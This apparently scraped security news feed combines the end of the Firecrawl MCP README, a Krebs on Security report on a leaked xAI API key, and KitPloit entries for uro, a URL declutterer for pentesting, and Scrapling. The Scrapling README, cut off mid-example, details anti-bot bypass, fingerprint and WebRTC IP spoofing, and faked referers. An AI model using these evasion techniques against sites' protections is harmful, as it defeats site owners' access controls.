  • Optional when using self-hosted instance with FIRECRAWL_API_URL
  • FIRECRAWL_API_URL (Optional): Custom API endpoint for self-hosted instances
  • Example: https://firecrawl.your-domain.com
  • If not provided, the cloud API will be used (requires API key)

Optional Configuration

Retry Configuration
  • FIRECRAWL_RETRY_MAX_ATTEMPTS: Maximum number of retry attempts (default: 3)
  • FIRECRAWL_RETRY_INITIAL_DELAY: Initial delay in milliseconds before first retry (default: 1000)
  • FIRECRAWL_RETRY_MAX_DELAY: Maximum delay in milliseconds between retries (default: 10000)
  • FIRECRAWL_RETRY_BACKOFF_FACTOR: Exponential backoff multiplier (default: 2)
Credit Usage Monitoring
  • FIRECRAWL_CREDIT_WARNING_THRESHOLD: Credit usage warning threshold (default: 1000)
  • FIRECRAWL_CREDIT_CRITICAL_THRESHOLD: Credit usage critical threshold (default: 100)

Configuration Examples

For cloud API usage with custom retry and credit monitoring:

# Required for cloud API
export FIRECRAWL_API_KEY=your-api-key

# Optional retry configuration
export FIRECRAWL_RETRY_MAX_ATTEMPTS=5 # Increase max retry attempts
export FIRECRAWL_RETRY_INITIAL_DELAY=2000 # Start with 2s delay
export FIRECRAWL_RETRY_MAX_DELAY=30000 # Maximum 30s delay
export FIRECRAWL_RETRY_BACKOFF_FACTOR=3 # More aggressive backoff

# Optional credit monitoring
export FIRECRAWL_CREDIT_WARNING_THRESHOLD=2000 # Warning at 2000 credits
export FIRECRAWL_CREDIT_CRITICAL_THRESHOLD=500 # Critical at 500 credits

For self-hosted instance:

# Required for self-hosted
export FIRECRAWL_API_URL=https://firecrawl.your-domain.com

# Optional authentication for self-hosted
export FIRECRAWL_API_KEY=your-api-key # If your instance requires auth

# Custom retry configuration
export FIRECRAWL_RETRY_MAX_ATTEMPTS=10
export FIRECRAWL_RETRY_INITIAL_DELAY=500 # Start with faster retries

Usage with Claude Desktop

Add this to your claude_desktop_config.json:

{
"mcpServers": {
"mcp-server-firecrawl": {
"command": "npx",
"args": ["-y", "firecrawl-mcp"],
"env": {
"FIRECRAWL_API_KEY": "YOUR_API_KEY_HERE",

"FIRECRAWL_RETRY_MAX_ATTEMPTS": "5",
"FIRECRAWL_RETRY_INITIAL_DELAY": "2000",
"FIRECRAWL_RETRY_MAX_DELAY": "30000",
"FIRECRAWL_RETRY_BACKOFF_FACTOR": "3",

"FIRECRAWL_CREDIT_WARNING_THRESHOLD": "2000",
"FIRECRAWL_CREDIT_CRITICAL_THRESHOLD": "500"
}
}
}
}

System Configuration

The server includes several configurable parameters that can be set via environment variables. Here are the default values if not configured:

const CONFIG = {
retry: {
maxAttempts: 3, // Number of retry attempts for rate-limited requests
initialDelay: 1000, // Initial delay before first retry (in milliseconds)
maxDelay: 10000, // Maximum delay between retries (in milliseconds)
backoffFactor: 2, // Multiplier for exponential backoff
},
credit: {
warningThreshold: 1000, // Warn when credit usage reaches this level
criticalThreshold: 100, // Critical alert when credit usage reaches this level
},
};

These configurations control:

  1. Retry Behavior

  2. Automatically retries failed requests due to rate limits

  3. Uses exponential backoff to avoid overwhelming the API
  4. Example: With default settings, retries will be attempted at:

    • 1st retry: 1 second delay
    • 2nd retry: 2 seconds delay
    • 3rd retry: 4 seconds delay (capped at maxDelay)
  5. Credit Usage Monitoring

  6. Tracks API credit consumption for cloud API usage
  7. Provides warnings at specified thresholds
  8. Helps prevent unexpected service interruption
  9. Example: With default settings:
    • Warning at 1000 credits remaining
    • Critical alert at 100 credits remaining

Rate Limiting and Batch Processing

The server utilizes Firecrawl's built-in rate limiting and batch processing capabilities:

  • Automatic rate limit handling with exponential backoff
  • Efficient parallel processing for batch operations
  • Smart request queuing and throttling
  • Automatic retries for transient errors

Available Tools

1. Scrape Tool (firecrawl_scrape)

Scrape content from a single URL with advanced options.

{
"name": "firecrawl_scrape",
"arguments": {
"url": "https://example.com",
"formats": ["markdown"],
"onlyMainContent": true,
"waitFor": 1000,
"timeout": 30000,
"mobile": false,
"includeTags": ["article", "main"],
"excludeTags": ["nav", "footer"],
"skipTlsVerification": false
}
}

2. Batch Scrape Tool (firecrawl_batch_scrape)

Scrape multiple URLs efficiently with built-in rate limiting and parallel processing.

{
"name": "firecrawl_batch_scrape",
"arguments": {
"urls": ["https://example1.com", "https://example2.com"],
"options": {
"formats": ["markdown"],
"onlyMainContent": true
}
}
}

Response includes operation ID for status checking:

{
"content": [
{
"type": "text",
"text": "Batch operation queued with ID: batch_1. Use firecrawl_check_batch_status to check progress."
}
],
"isError": false
}

3. Check Batch Status (firecrawl_check_batch_status)

Check the status of a batch operation.

{
"name": "firecrawl_check_batch_status",
"arguments": {
"id": "batch_1"
}
}

4. Search Tool (firecrawl_search)

Search the web and optionally extract content from search results.

{
"name": "firecrawl_search",
"arguments": {
"query": "your search query",
"limit": 5,
"lang": "en",
"country": "us",
"scrapeOptions": {
"formats": ["markdown"],
"onlyMainContent": true
}
}
}

5. Crawl Tool (firecrawl_crawl)

Start an asynchronous crawl with advanced options.

{
"name": "firecrawl_crawl",
"arguments": {
"url": "https://example.com",
"maxDepth": 2,
"limit": 100,
"allowExternalLinks": false,
"deduplicateSimilarURLs": true
}
}

6. Extract Tool (firecrawl_extract)

Extract structured information from web pages using LLM capabilities. Supports both cloud AI and self-hosted LLM extraction.

{
"name": "firecrawl_extract",
"arguments": {
"urls": ["https://example.com/page1", "https://example.com/page2"],
"prompt": "Extract product information including name, price, and description",
"systemPrompt": "You are a helpful assistant that extracts product information",
"schema": {
"type": "object",
"properties": {
"name": { "type": "string" },
"price": { "type": "number" },
"description": { "type": "string" }
},
"required": ["name", "price"]
},
"allowExternalLinks": false,
"enableWebSearch": false,
"includeSubdomains": false
}
}

Example response:

{
"content": [
{
"type": "text",
"text": {
"name": "Example Product",
"price": 99.99,
"description": "This is an example product description"
}
}
],
"isError": false
}

Extract Tool Options:

  • urls: Array of URLs to extract information from
  • prompt: Custom prompt for the LLM extraction
  • systemPrompt: System prompt to guide the LLM
  • schema: JSON schema for structured data extraction
  • allowExternalLinks: Allow extraction from external links
  • enableWebSearch: Enable web search for additional context
  • includeSubdomains: Include subdomains in extraction

When using a self-hosted instance, the extraction will use your configured LLM. For cloud API, it uses Firecrawl's managed LLM service.

7. Deep Research Tool (firecrawl_deep_research)

Conduct deep web research on a query using intelligent crawling, search, and LLM analysis.

{
"name": "firecrawl_deep_research",
"arguments": {
"query": "how does carbon capture technology work?",
"maxDepth": 3,
"timeLimit": 120,
"maxUrls": 50
}
}

Arguments:

  • query (string, required): The research question or topic to explore.
  • maxDepth (number, optional): Maximum recursive depth for crawling/search (default: 3).
  • timeLimit (number, optional): Time limit in seconds for the research session (default: 120).
  • maxUrls (number, optional): Maximum number of URLs to analyze (default: 50).

Returns:

  • Final analysis generated by an LLM based on research. (data.finalAnalysis)
  • May also include structured activities and sources used in the research process.

8. Generate LLMs.txt Tool (firecrawl_generate_llmstxt)

Generate a standardized llms.txt (and optionally llms-full.txt) file for a given domain. This file defines how large language models should interact with the site.

{
"name": "firecrawl_generate_llmstxt",
"arguments": {
"url": "https://example.com",
"maxUrls": 20,
"showFullText": true
}
}

Arguments:

  • url (string, required): The base URL of the website to analyze.
  • maxUrls (number, optional): Max number of URLs to include (default: 10).
  • showFullText (boolean, optional): Whether to include llms-full.txt contents in the response.

Returns:

  • Generated llms.txt file contents and optionally the llms-full.txt (data.llmstxt and/or data.llmsfulltxt)

Logging System

The server includes comprehensive logging:

  • Operation status and progress
  • Performance metrics
  • Credit usage monitoring
  • Rate limit tracking
  • Error conditions

Example log messages:

[INFO] Firecrawl MCP Server initialized successfully
[INFO] Starting scrape for URL: https://example.com
[INFO] Batch operation queued with ID: batch_1
[WARNING] Credit usage has reached warning threshold
[ERROR] Rate limit exceeded, retrying in 2s...

Error Handling

The server provides robust error handling:

  • Automatic retries for transient errors
  • Rate limit handling with backoff
  • Detailed error messages
  • Credit usage warnings
  • Network resilience

Example error response:

{
"content": [
{
"type": "text",
"text": "Error: Rate limit exceeded. Retrying in 2 seconds..."
}
],
"isError": true
}

Development

# Install dependencies
npm install

# Build
npm run build

# Run tests
npm test

Contributing

  1. Fork the repository
  2. Create your feature branch
  3. Run tests: npm test
  4. Submit a pull request

License

MIT License - see LICENSE file for details



☐ ☆ ✇ Security – Cisco Blog

Black Hat Asia 2025 NOC: Innovation in SOC

By: Jessica (Bair) Oppenheimer — April 24th 2025 at 12:00
Cisco is the Security Cloud Provider to the Black Hat conferences. Learn about the latest innovations for the SOC of the Future.
☐ ☆ ✇ Krebs on Security

xAI Dev Leaks API Key for Private SpaceX, Tesla LLMs

By: BrianKrebs — May 2nd 2025 at 00:52

An employee at Elon Musk’s artificial intelligence company xAI leaked a private key on GitHub that for the past two months could have allowed anyone to query private xAI large language models (LLMs) which appear to have been custom made for working with internal data from Musk’s companies, including SpaceX, Tesla and Twitter/X, KrebsOnSecurity has learned.

Image: Shutterstock, @sdx15.

Philippe Caturegli, “chief hacking officer” at the security consultancy Seralys, was the first to publicize the leak of credentials for an x.ai application programming interface (API) exposed in the GitHub code repository of a technical staff member at xAI.

Caturegli’s post on LinkedIn caught the attention of researchers at GitGuardian, a company that specializes in detecting and remediating exposed secrets in public and proprietary environments. GitGuardian’s systems constantly scan GitHub and other code repositories for exposed API keys, and fire off automated alerts to affected users.

GitGuardian’s Eric Fourrier told KrebsOnSecurity the exposed API key had access to several unreleased models of Grok, the AI chatbot developed by xAI. In total, GitGuardian found the key had access to at least 60 fine-tuned and private LLMs.

“The credentials can be used to access the X.ai API with the identity of the user,” GitGuardian wrote in an email explaining their findings to xAI. “The associated account not only has access to public Grok models (grok-2-1212, etc) but also to what appears to be unreleased (grok-2.5V), development (research-grok-2p5v-1018), and private models (tweet-rejector, grok-spacex-2024-11-04).”

Fourrier found GitGuardian had alerted the xAI employee about the exposed API key nearly two months ago — on March 2. But as of April 30, when GitGuardian directly alerted xAI’s security team to the exposure, the key was still valid and usable. xAI told GitGuardian to report the matter through its bug bounty program at HackerOne, but just a few hours later the repository containing the API key was removed from GitHub.

“It looks like some of these internal LLMs were fine-tuned on SpaceX data, and some were fine-tuned with Tesla data,” Fourrier said. “I definitely don’t think a Grok model that’s fine-tuned on SpaceX data is intended to be exposed publicly.”

xAI did not respond to a request for comment. Nor did the 28-year-old xAI technical staff member whose key was exposed.

Carole Winqwist, chief marketing officer at GitGuardian, said giving potentially hostile users free access to private LLMs is a recipe for disaster.

“If you’re an attacker and you have direct access to the model and the back end interface for things like Grok, it’s definitely something you can use for further attacking,” she said. “An attacker could it use for prompt injection, to tweak the (LLM) model to serve their purposes, or try to implant code into the supply chain.”

The inadvertent exposure of internal LLMs for xAI comes as Musk’s so-called Department of Government Efficiency (DOGE) has been feeding sensitive government records into artificial intelligence tools. In February, The Washington Post reported DOGE officials were feeding data from across the Education Department into AI tools to probe the agency’s programs and spending.

The Post said DOGE plans to replicate this process across many departments and agencies, accessing the back-end software at different parts of the government and then using AI technology to extract and sift through information about spending on employees and programs.

“Feeding sensitive data into AI software puts it into the possession of a system’s operator, increasing the chances it will be leaked or swept up in cyberattacks,” Post reporters wrote.

Wired reported in March that DOGE has deployed a proprietary chatbot called GSAi to 1,500 federal workers at the General Services Administration, part of an effort to automate tasks previously done by humans as DOGE continues its purge of the federal workforce.

A Reuters report last month said Trump administration officials told some U.S. government employees that DOGE is using AI to surveil at least one federal agency’s communications for hostility to President Trump and his agenda. Reuters wrote that the DOGE team has heavily deployed Musk’s Grok AI chatbot as part of their work slashing the federal government, although Reuters said it could not establish exactly how Grok was being used.

Caturegli said while there is no indication that federal government or user data could be accessed through the exposed x.ai API key, these private models are likely trained on proprietary data and may unintentionally expose details related to internal development efforts at xAI, Twitter, or SpaceX.

“The fact that this key was publicly exposed for two months and granted access to internal models is concerning,” Caturegli said. “This kind of long-lived credential exposure highlights weak key management and insufficient internal monitoring, raising questions about safeguards around developer access and broader operational security.”

☐ ☆ ✇ KitPloit - PenTest Tools!

Uro - Declutters Url Lists For Crawling/Pentesting

By: Unknown — May 2nd 2025 at 00:30


Using a URL list for security testing can be painful as there are a lot of URLs that have uninteresting/duplicate content; uro aims to solve that.

It doesn't make any http requests to the URLs and removes: - incremental urls e.g. /page/1/ and /page/2/ - blog posts and similar human written content e.g. /posts/a-brief-history-of-time - urls with same path but parameter value difference e.g. /page.php?id=1 and /page.php?id=2 - images, js, css and other "useless" files


Installation

The recommended way to install uro is as follows:

pipx install uro

Note: If you are using an older version of python, use pip instead of pipx

Basic Usage

The quickest way to include uro in your workflow is to feed it data through stdin and print it to your terminal.

cat urls.txt | uro

Advanced usage

Reading urls from a file (-i/--input)

uro -i input.txt

Writing urls to a file (-o/--output)

If the file already exists, uro will not overwrite the contents. Otherwise, it will create a new file.

uro -i input.txt -o output.txt

Whitelist (-w/--whitelist)

uro will ignore all other extensions except the ones provided.

uro -w php asp html

Note: Extensionless pages e.g. /books/1 will still be included. To remove them too, use --filter hasext.

Blacklist (-b/--blacklist)

uro will ignore the given extensions.

uro -b jpg png js pdf

Note: uro has a list of "useless" extensions which it removes by default; that list will be overridden by whatever extensions you provide through blacklist option. Extensionless pages e.g. /books/1 will still be included. To remove them too, use --filter hasext.

Filters (-f/--filters)

For granular control, uro supports the following filters:

  1. hasparams: only output urls that have query parameters e.g. http://example.com/page.php?id=
  2. noparams: only output urls that have no query parameters e.g. http://example.com/page.php
  3. hasext: only output urls that have extensions e.g. http://example.com/page.php
  4. noext: only output urls that have no extensions e.g. http://example.com/page
  5. allexts: don't remove any page based on extension e.g. keep .jpg which would be removed otherwise
  6. keepcontent: keep human written content e.g. blogs.
  7. keepslash: don't remove trailing slash from urls e.g. http://example.com/page/
  8. vuln: only output urls with parameters that are know to be vulnerable. More info.

Example: uro --filters hasexts hasparams



☐ ☆ ✇ Security – Cisco Blog

Instant Attack Verification: Verification to Trust Automated Response

By: Briana Farro — April 29th 2025 at 12:00
Discover how Cisco XDR’s Instant Attack Verification brings real-time threat validation for faster, smarter SOC response.
☐ ☆ ✇ KitPloit - PenTest Tools!

Scrapling - An Undetectable, Powerful, Flexible, High-Performance Python Library That Makes Web Scraping Simple And Easy Again!

By: Unknown — April 28th 2025 at 12:30


Dealing with failing web scrapers due to anti-bot protections or website changes? Meet Scrapling.

Scrapling is a high-performance, intelligent web scraping library for Python that automatically adapts to website changes while significantly outperforming popular alternatives. For both beginners and experts, Scrapling provides powerful features while maintaining simplicity.

>> from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher
# Fetch websites' source under the radar!
>> page = StealthyFetcher.fetch('https://example.com', headless=True, network_idle=True)
>> print(page.status)
200
>> products = page.css('.product', auto_save=True) # Scrape data that survives website design changes!
>> # Later, if the website structure changes, pass `auto_match=True`
>> products = page.css('.product', auto_match=True) # and Scrapling still finds them!

Key Features

Fetch websites as you prefer with async support

  • HTTP Requests: Fast and stealthy HTTP requests with the Fetcher class.
  • Dynamic Loading & Automation: Fetch dynamic websites with the PlayWrightFetcher class through your real browser, Scrapling's stealth mode, Playwright's Chrome browser, or NSTbrowser's browserless!
  • Anti-bot Protections Bypass: Easily bypass protections with StealthyFetcher and PlayWrightFetcher classes.

Adaptive Scraping

  • 🔄 Smart Element Tracking: Relocate elements after website changes, using an intelligent similarity system and integrated storage.
  • 🎯 Flexible Selection: CSS selectors, XPath selectors, filters-based search, text search, regex search and more.
  • 🔍 Find Similar Elements: Automatically locate elements similar to the element you found!
  • 🧠 Smart Content Scraping: Extract data from multiple websites without specific selectors using Scrapling powerful features.

High Performance

  • 🚀 Lightning Fast: Built from the ground up with performance in mind, outperforming most popular Python scraping libraries.
  • 🔋 Memory Efficient: Optimized data structures for minimal memory footprint.
  • Fast JSON serialization: 10x faster than standard library.

Developer Friendly

  • 🛠️ Powerful Navigation API: Easy DOM traversal in all directions.
  • 🧬 Rich Text Processing: All strings have built-in regex, cleaning methods, and more. All elements' attributes are optimized dictionaries that takes less memory than standard dictionaries with added methods.
  • 📝 Auto Selectors Generation: Generate robust short and full CSS/XPath selectors for any element.
  • 🔌 Familiar API: Similar to Scrapy/BeautifulSoup and the same pseudo-elements used in Scrapy.
  • 📘 Type hints: Complete type/doc-strings coverage for future-proofing and best autocompletion support.

Getting Started

from scrapling.fetchers import Fetcher

fetcher = Fetcher(auto_match=False)

# Do http GET request to a web page and create an Adaptor instance
page = fetcher.get('https://quotes.toscrape.com/', stealthy_headers=True)
# Get all text content from all HTML tags in the page except `script` and `style` tags
page.get_all_text(ignore_tags=('script', 'style'))

# Get all quotes elements, any of these methods will return a list of strings directly (TextHandlers)
quotes = page.css('.quote .text::text') # CSS selector
quotes = page.xpath('//span[@class="text"]/text()') # XPath
quotes = page.css('.quote').css('.text::text') # Chained selectors
quotes = [element.text for element in page.css('.quote .text')] # Slower than bulk query above

# Get the first quote element
quote = page.css_first('.quote') # same as page.css('.quote').first or page.css('.quote')[0]

# Tired of selectors? Use find_all/find
# Get all 'div' HTML tags that one of its 'class' values is 'quote'
quotes = page.find_all('div', {'class': 'quote'})
# Same as
quotes = page.find_all('div', class_='quote')
quotes = page.find_all(['div'], class_='quote')
quotes = page.find_all(class_='quote') # and so on...

# Working with elements
quote.html_content # Get Inner HTML of this element
quote.prettify() # Prettified version of Inner HTML above
quote.attrib # Get that element's attributes
quote.path # DOM path to element (List of all ancestors from <html> tag till the element itself)

To keep it simple, all methods can be chained on top of each other!

Parsing Performance

Scrapling isn't just powerful - it's also blazing fast. Scrapling implements many best practices, design patterns, and numerous optimizations to save fractions of seconds. All of that while focusing exclusively on parsing HTML documents. Here are benchmarks comparing Scrapling to popular Python libraries in two tests.

Text Extraction Speed Test (5000 nested elements).

# Library Time (ms) vs Scrapling
1 Scrapling 5.44 1.0x
2 Parsel/Scrapy 5.53 1.017x
3 Raw Lxml 6.76 1.243x
4 PyQuery 21.96 4.037x
5 Selectolax 67.12 12.338x
6 BS4 with Lxml 1307.03 240.263x
7 MechanicalSoup 1322.64 243.132x
8 BS4 with html5lib 3373.75 620.175x

As you see, Scrapling is on par with Scrapy and slightly faster than Lxml which both libraries are built on top of. These are the closest results to Scrapling. PyQuery is also built on top of Lxml but still, Scrapling is 4 times faster.

Extraction By Text Speed Test

Library Time (ms) vs Scrapling
Scrapling 2.51 1.0x
AutoScraper 11.41 4.546x

Scrapling can find elements with more methods and it returns full element Adaptor objects not only the text like AutoScraper. So, to make this test fair, both libraries will extract an element with text, find similar elements, and then extract the text content for all of them. As you see, Scrapling is still 4.5 times faster at the same task.

All benchmarks' results are an average of 100 runs. See our benchmarks.py for methodology and to run your comparisons.

Installation

Scrapling is a breeze to get started with; Starting from version 0.2.9, we require at least Python 3.9 to work.

pip3 install scrapling

Then run this command to install browsers' dependencies needed to use Fetcher classes

scrapling install

If you have any installation issues, please open an issue.

Fetching Websites

Fetchers are interfaces built on top of other libraries with added features that do requests or fetch pages for you in a single request fashion and then return an Adaptor object. This feature was introduced because the only option we had before was to fetch the page as you wanted it, then pass it manually to the Adaptor class to create an Adaptor instance and start playing around with the page.

Features

You might be slightly confused by now so let me clear things up. All fetcher-type classes are imported in the same way

from scrapling.fetchers import Fetcher, StealthyFetcher, PlayWrightFetcher

All of them can take these initialization arguments: auto_match, huge_tree, keep_comments, keep_cdata, storage, and storage_args, which are the same ones you give to the Adaptor class.

If you don't want to pass arguments to the generated Adaptor object and want to use the default values, you can use this import instead for cleaner code:

from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher

then use it right away without initializing like:

page = StealthyFetcher.fetch('https://example.com') 

Also, the Response object returned from all fetchers is the same as the Adaptor object except it has these added attributes: status, reason, cookies, headers, history, and request_headers. All cookies, headers, and request_headers are always of type dictionary.

[!NOTE] The auto_match argument is enabled by default which is the one you should care about the most as you will see later.

Fetcher

This class is built on top of httpx with additional configuration options, here you can do GET, POST, PUT, and DELETE requests.

For all methods, you have stealthy_headers which makes Fetcher create and use real browser's headers then create a referer header as if this request came from Google's search of this URL's domain. It's enabled by default. You can also set the number of retries with the argument retries for all methods and this will make httpx retry requests if it failed for any reason. The default number of retries for all Fetcher methods is 3.

Hence: All headers generated by stealthy_headers argument can be overwritten by you through the headers argument

You can route all traffic (HTTP and HTTPS) to a proxy for any of these methods in this format http://username:password@localhost:8030

>> page = Fetcher().get('https://httpbin.org/get', stealthy_headers=True, follow_redirects=True)
>> page = Fetcher().post('https://httpbin.org/post', data={'key': 'value'}, proxy='http://username:password@localhost:8030')
>> page = Fetcher().put('https://httpbin.org/put', data={'key': 'value'})
>> page = Fetcher().delete('https://httpbin.org/delete')

For Async requests, you will just replace the import like below:

>> from scrapling.fetchers import AsyncFetcher
>> page = await AsyncFetcher().get('https://httpbin.org/get', stealthy_headers=True, follow_redirects=True)
>> page = await AsyncFetcher().post('https://httpbin.org/post', data={'key': 'value'}, proxy='http://username:password@localhost:8030')
>> page = await AsyncFetcher().put('https://httpbin.org/put', data={'key': 'value'})
>> page = await AsyncFetcher().delete('https://httpbin.org/delete')

StealthyFetcher

This class is built on top of Camoufox, bypassing most anti-bot protections by default. Scrapling adds extra layers of flavors and configurations to increase performance and undetectability even further.

>> page = StealthyFetcher().fetch('https://www.browserscan.net/bot-detection')  # Running headless by default
>> page.status == 200
True
>> page = await StealthyFetcher().async_fetch('https://www.browserscan.net/bot-detection') # the async version of fetch
>> page.status == 200
True

Note: all requests done by this fetcher are waiting by default for all JS to be fully loaded and executed so you don't have to :)

For the sake of simplicity, expand this for the complete list of arguments | Argument | Description | Optional | |:-------------------:|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:--------:| | url | Target url | ❌ | | headless | Pass `True` to run the browser in headless/hidden (**default**), `virtual` to run it in virtual screen mode, or `False` for headful/visible mode. The `virtual` mode requires having `xvfb` installed. | ✔️ | | block_images | Prevent the loading of images through Firefox preferences. _This can help save your proxy usage but be careful with this option as it makes some websites never finish loading._ | ✔️ | | disable_resources | Drop requests of unnecessary resources for a speed boost. It depends but it made requests ~25% faster in my tests for some websites.
Requests dropped are of type `font`, `image`, `media`, `beacon`, `object`, `imageset`, `texttrack`, `websocket`, `csp_report`, and `stylesheet`. _This can help save your proxy usage but be careful with this option as it makes some websites never finish loading._ | ✔️ | | google_search | Enabled by default, Scrapling will set the referer header to be as if this request came from a Google search for this website's domain name. | ✔️ | | extra_headers | A dictionary of extra headers to add to the request. _The referer set by the `google_search` argument takes priority over the referer set here if used together._ | ✔️ | | block_webrtc | Blocks WebRTC entirely. | ✔️ | | page_action | Added for automation. A function that takes the `page` object, does the automation you need, then returns `page` again. | ✔️ | | addons | List of Firefox addons to use. **Must be paths to extracted addons.** | ✔️ | | humanize | Humanize the cursor movement. Takes either True or the MAX duration in seconds of the cursor movement. The cursor typically takes up to 1.5 seconds to move across the window. | ✔️ | | allow_webgl | Enabled by default. Disabling it WebGL not recommended as many WAFs now checks if WebGL is enabled. | ✔️ | | geoip | Recommended to use with proxies; Automatically use IP's longitude, latitude, timezone, country, locale, & spoof the WebRTC IP address. It will also calculate and spoof the browser's language based on the distribution of language speakers in the target region. | ✔️ | | disable_ads | Disabled by default, this installs `uBlock Origin` addon on the browser if enabled. | ✔️ | | network_idle | Wait for the page until there are no network connections for at least 500 ms. | ✔️ | | timeout | The timeout in milliseconds that is used in all operations and waits through the page. The default is 30000. | ✔️ | | wait_selector | Wait for a specific css selector to be in a specific state. | ✔️ | | proxy | The proxy to be used with requests, it can be a string or a dictionary with the keys 'server', 'username', and 'password' only. | ✔️ | | os_randomize | If enabled, Scrapling will randomize the OS fingerprints used. The default is Scrapling matching the fingerprints with the current OS. | ✔️ | | wait_selector_state | The state to wait for the selector given with `wait_selector`. _Default state is `attached`._ | ✔️ |

This list isn't final so expect a lot more additions and flexibility to be added in the next versions!

PlayWrightFetcher

This class is built on top of Playwright which currently provides 4 main run options but they can be mixed as you want.

>> page = PlayWrightFetcher().fetch('https://www.google.com/search?q=%22Scrapling%22', disable_resources=True)  # Vanilla Playwright option
>> page.css_first("#search a::attr(href)")
'https://github.com/D4Vinci/Scrapling'
>> page = await PlayWrightFetcher().async_fetch('https://www.google.com/search?q=%22Scrapling%22', disable_resources=True) # the async version of fetch
>> page.css_first("#search a::attr(href)")
'https://github.com/D4Vinci/Scrapling'

Note: all requests done by this fetcher are waiting by default for all JS to be fully loaded and executed so you don't have to :)

Using this Fetcher class, you can make requests with: 1) Vanilla Playwright without any modifications other than the ones you chose. 2) Stealthy Playwright with the stealth mode I wrote for it. It's still a WIP but it bypasses many online tests like Sannysoft's. Some of the things this fetcher's stealth mode does include: * Patching the CDP runtime fingerprint. * Mimics some of the real browsers' properties by injecting several JS files and using custom options. * Using custom flags on launch to hide Playwright even more and make it faster. * Generates real browser's headers of the same type and same user OS then append it to the request's headers. 3) Real browsers by passing the real_chrome argument or the CDP URL of your browser to be controlled by the Fetcher and most of the options can be enabled on it. 4) NSTBrowser's docker browserless option by passing the CDP URL and enabling nstbrowser_mode option.

Hence using the real_chrome argument requires that you have Chrome browser installed on your device

Add that to a lot of controlling/hiding options as you will see in the arguments list below.

Expand this for the complete list of arguments | Argument | Description | Optional | |:-------------------:|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:--------:| | url | Target url | ❌ | | headless | Pass `True` to run the browser in headless/hidden (**default**), or `False` for headful/visible mode. | ✔️ | | disable_resources | Drop requests of unnecessary resources for a speed boost. It depends but it made requests ~25% faster in my tests for some websites.
Requests dropped are of type `font`, `image`, `media`, `beacon`, `object`, `imageset`, `texttrack`, `websocket`, `csp_report`, and `stylesheet`. _This can help save your proxy usage but be careful with this option as it makes some websites never finish loading._ | ✔️ | | useragent | Pass a useragent string to be used. **Otherwise the fetcher will generate a real Useragent of the same browser and use it.** | ✔️ | | network_idle | Wait for the page until there are no network connections for at least 500 ms. | ✔️ | | timeout | The timeout in milliseconds that is used in all operations and waits through the page. The default is 30000. | ✔️ | | page_action | Added for automation. A function that takes the `page` object, does the automation you need, then returns `page` again. | ✔️ | | wait_selector | Wait for a specific css selector to be in a specific state. | ✔️ | | wait_selector_state | The state to wait for the selector given with `wait_selector`. _Default state is `attached`._ | ✔️ | | google_search | Enabled by default, Scrapling will set the referer header to be as if this request came from a Google search for this website's domain name. | ✔️ | | extra_headers | A dictionary of extra headers to add to the request. The referer set by the `google_search` argument takes priority over the referer set here if used together. | ✔️ | | proxy | The proxy to be used with requests, it can be a string or a dictionary with the keys 'server', 'username', and 'password' only. | ✔️ | | hide_canvas | Add random noise to canvas operations to prevent fingerprinting. | ✔️ | | disable_webgl | Disables WebGL and WebGL 2.0 support entirely. | ✔️ | | stealth | Enables stealth mode, always check the documentation to see what stealth mode does currently. | ✔️ | | real_chrome | If you have Chrome browser installed on your device, enable this and the Fetcher will launch an instance of your browser and use it. | ✔️ | | locale | Set the locale for the browser if wanted. The default value is `en-US`. | ✔️ | | cdp_url | Instead of launching a new browser instance, connect to this CDP URL to control real browsers/NSTBrowser through CDP. | ✔️ | | nstbrowser_mode | Enables NSTBrowser mode, **it have to be used with `cdp_url` argument or it will get completely ignored.** | ✔️ | | nstbrowser_config | The config you want to send with requests to the NSTBrowser. _If left empty, Scrapling defaults to an optimized NSTBrowser's docker browserless config._ | ✔️ |

This list isn't final so expect a lot more additions and flexibility to be added in the next versions!

Advanced Parsing Features

Smart Navigation

>>> quote.tag
'div'

>>> quote.parent
<data='<div class="col-md-8"> <div class="quote...' parent='<div class="row"> <div class="col-md-8">...'>

>>> quote.parent.tag
'div'

>>> quote.children
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<span>by <small class="author" itemprop=...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<div class="tags"> Tags: <meta class="ke...' parent='<div class="quote" itemscope itemtype="h...'>]

>>> quote.siblings
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

>>> quote.next # gets the next element, the same logic applies to `quote.previous`
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>

>>> quote.children.css_first(".author::text")
'Albert Einstein'

>>> quote.has_class('quote')
True

# Generate new selectors for any element
>>> quote.generate_css_selector
'body > div > div:nth-of-type(2) > div > div'

# Test these selectors on your favorite browser or reuse them again in the library's methods!
>>> quote.generate_xpath_selector
'//body/div/div[2]/div/div'

If your case needs more than the element's parent, you can iterate over the whole ancestors' tree of any element like below

for ancestor in quote.iterancestors():
# do something with it...

You can search for a specific ancestor of an element that satisfies a function, all you need to do is to pass a function that takes an Adaptor object as an argument and return True if the condition satisfies or False otherwise like below:

>>> quote.find_ancestor(lambda ancestor: ancestor.has_class('row'))
<data='<div class="row"> <div class="col-md-8">...' parent='<div class="container"> <div class="row...'>

Content-based Selection & Finding Similar Elements

You can select elements by their text content in multiple ways, here's a full example on another website:

>>> page = Fetcher().get('https://books.toscrape.com/index.html')

>>> page.find_by_text('Tipping the Velvet') # Find the first element whose text fully matches this text
<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>

>>> page.urljoin(page.find_by_text('Tipping the Velvet').attrib['href']) # We use `page.urljoin` to return the full URL from the relative `href`
'https://books.toscrape.com/catalogue/tipping-the-velvet_999/index.html'

>>> page.find_by_text('Tipping the Velvet', first_match=False) # Get all matches if there are more
[<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>]

>>> page.find_by_regex(r'£[\d\.]+') # Get the first element that its text content matches my price regex
